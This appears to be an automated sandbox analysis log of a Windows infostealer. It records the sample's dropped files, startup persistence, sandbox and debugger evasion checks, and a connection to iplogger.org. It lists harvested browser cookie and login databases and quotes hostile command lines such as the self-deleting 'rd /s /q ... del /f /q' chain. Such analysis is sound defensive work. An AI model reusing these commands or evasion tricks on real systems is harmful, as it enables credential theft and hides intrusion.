                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files\_Chrome
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files\_Opera
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files\_Brave
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \files_
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \files_\files
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \files_\_Chrome
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \files_\_Opera
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \files_\_Brave
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: >6C
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wextract.pdb source: wheezy.exe, wheezy.exe.10.dr
                      Source: Binary string: wextract.pdb0lbp source: wheezy.exe, 0000000D.00000002.338763664.00000000004E1000.00000020.00020000.sdmp, wheezy.exe.10.dr
                      Source: Binary string: C:\sojeli.pdb source: 7yyqdBJVGf.exe
                      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: parted.exe, 0000000F.00000002.332649250.00007FF613923000.00000040.00020000.sdmp, IntelRapid.exe, 00000016.00000002.776682417.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001A.00000002.340848160.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001D.00000002.367061379.00007FF778293000.00000040.00020000.sdmp
                      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: IntelRapid.exe
                      Source: Binary string: acppage.pdb source: acppage.dll.10.dr
                      Source: 7yyqdBJVGf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 7yyqdBJVGf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 7yyqdBJVGf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 7yyqdBJVGf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 7yyqdBJVGf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation:

                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Unpacked PE file: 0.2.7yyqdBJVGf.exe.400000.0.unpack
                      Obfuscated command line found
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_004174B6 push ecx; ret
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0043768D push esi; ret
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E7049 push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name: .themida
                      Source: parted.exe.10.dr Static PE information: section name: .boot
                      Source: acppage.dll.10.dr Static PE information: section name: .orpc
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name: .themida
                      Source: IntelRapid.exe.15.dr Static PE information: section name: .boot
                      Source: initial sample Static PE information: section where entry point is pointing to: .boot
                      Source: wheezy.exe.10.dr Static PE information: real checksum: 0xe94bb should be: 0xe5407
                      Source: lv[1].exe.0.dr Static PE information: real checksum: 0x0 should be: 0x450fee
                      Source: UAC.dll.10.dr Static PE information: real checksum: 0x0 should be: 0xde12
                      Source: File.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x450fee
                      Source: initial sample Static PE information: section name: entropy: 7.97590031918
                      Source: initial sample Static PE information: section name: entropy: 7.97590031918
                      Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Users\user\AppData\Local\Temp\nsc24D7.tmp\UAC.dll
                      Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Program Files (x86)\foler\olader\acppage.dll
                      Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Users\user\AppData\Local\Temp\dislip\parted.exe
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File created: C:\Users\user\AppData\Local\Temp\File.exe
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exe
                      Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Program Files (x86)\foler\olader\adprovider.dll
                      Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe
                      Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Program Files (x86)\foler\olader\acledit.dll
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe File created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E2A51 CompareStringA,CompareStringA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,LocalAlloc,GetFileAttributesA,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnkJump to behavior

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Process created: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com; Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\File.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe; System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000; Thread sleep count: 31 > 30
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000; Thread sleep count: 46 > 30
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000; Thread sleep count: 39 > 30
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000; Thread sleep count: 32 > 30
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000; Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344; Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344; Thread sleep time: -160000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344; Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 1480; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Windows\SysWOW64\wscript.exe; Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files
Source: IntelRapid.exe, 0000001D.00000002.365761146.000001E574EA8000.00000004.00000020.sdmp; Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: Bisogna.exe.com, 00000018.00000002.584887788.0000000003828000.00000004.00000001.sdmp; Binary or memory string: YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW.48.ID
Source: IntelRapid.exe, 0000001A.00000002.339502137.000001B5F8B47000.00000004.00000020.sdmp; Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__m
Source: Bisogna.exe.com, 00000015.00000003.343298124.0000000001913000.00000004.00000001.sdmp; Binary or memory string: l $MatUeAuy = 'cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
Source: Bisogna.exe.com, 00000015.00000002.356329862.000000000452E000.00000004.00000001.sdmp; Binary or memory string: YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW
Source: Bisogna.exe.com, 00000015.00000003.346272795.00000000018F8000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp, l.19.dr; Binary or memory string: Local $dpjdrFdkImGxcUs = 'YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW'
Source: Bisogna.exe.com, 00000018.00000002.586020257.00000000039DE000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
Source: l.19.dr; Binary or memory string: Local $MatUeAuy = 'cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
Source: Bisogna.exe.com, 00000018.00000002.584960509.000000000384E000.00000004.00000001.sdmp; Binary or memory string: cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN
Source: Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW (
Source: Bisogna.exe.com, 00000015.00000002.355832270.000000000191C000.00000004.00000001.sdmp; Binary or memory string: gZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_004026C0 Sleep,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_0042B3BE FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\File.exe; Code function: 10_2_00406301 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\File.exe; Code function: 10_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe; Code function: 13_2_004E23D4 FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe; System information queried: ModuleInformation

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\File.exe; Code function: 10_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_0042B021 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_004238B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_0308092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_030AB271 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe; Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe; Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_00417261 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_0042C86D GetProcessHeap
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_004173F7 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_0041763D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_0041D9DD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe; Code function: 13_2_004E6ECF SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe; Code function: 13_2_004E6B2F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exe; Domain query: iplogger.org
Source: C:\Windows\SysWOW64\wscript.exe; Network Connect: 88.99.66.31 187
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Process created: C:\Users\user\AppData\Local\Temp\File.exe 'C:\Users\user~1\AppData\Local\Temp\File.exe'
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Bisogna.exe.com l
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com; Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe; Code function: 13_2_004E1808 LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary
Source: Bel.wav.13.dr; Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp; Binary or memory string: uProgram Manager
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp; Binary or memory string: Progman
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_cookies.db VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_key.bin VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_logins.db VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_webdata.db VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Information.txt VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Screen_Desktop.jpeg VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\screenshot.jpg VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\system_info.txt VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_cookies.db VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_key.bin VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_logins.db VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_webdata.db VolumeInformation
